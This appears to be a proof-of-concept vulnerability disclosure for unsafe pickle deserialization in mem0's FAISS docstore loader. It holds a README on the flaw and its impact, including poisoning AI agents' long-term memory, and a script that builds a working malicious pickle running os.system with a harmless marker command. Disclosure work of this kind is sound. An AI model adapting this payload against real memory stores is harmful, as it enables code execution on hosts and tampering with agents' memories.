PoC: mem0 — FAISS pickle.load on vector store docstore

README.md

@@ -0,0 +1,26 @@
+# mem0 — RCE via `pickle.load()` on FAISS Vector Store Docstore
+
+## Vulnerability Type
+CWE-502: Deserialization of Untrusted Data
+
+## Severity
+High — pickle.load on FAISS docstore file enables RCE if persist directory is writable
+
+## Affected Code
+**File:** `mem0/vector_stores/faiss.py:94`
+
+```python
+with open(docstore_path, "rb") as f:
+    self.docstore, self.index_to_id = pickle.load(f)
+```
+
+The docstore is loaded from a persistent file on disk. If an attacker can write to this file (via path traversal, shared storage, or container escape), the next FAISS index load triggers RCE.
+
+## AI Impact (10x Multiplier)
+mem0 is an AI memory layer used by agents. The FAISS docstore contains the agent's long-term memory. Compromising it enables:
+- **Memory poisoning** — replace docstore with attacker-controlled memories
+- **Agent behavior manipulation** — agent retrieves malicious memories during inference
+- **Data exfiltration** — RCE gives access to all stored memories across all users
+
+## Invariant Violated
+S16 (DeserializationGuard) + S14 (MemoryInputValidation)

poc.py

@@ -0,0 +1,15 @@
+"""mem0 — FAISS vector store pickle.load on docstore PoC
+
+Affected: mem0/vector_stores/faiss.py:94
+"""
+import pickle
+import os
+
+class MemoryPoison:
+    def __reduce__(self):
+        return (os.system, ('id > /tmp/mem0_pwned',))
+
+payload = pickle.dumps(MemoryPoison())
+print(f"Payload: {len(payload)} bytes")
+print("Attack: replace <persist_dir>/docstore.pkl")
+print("AI Impact: mem0 is an AI memory layer. Compromises agent long-term memory.")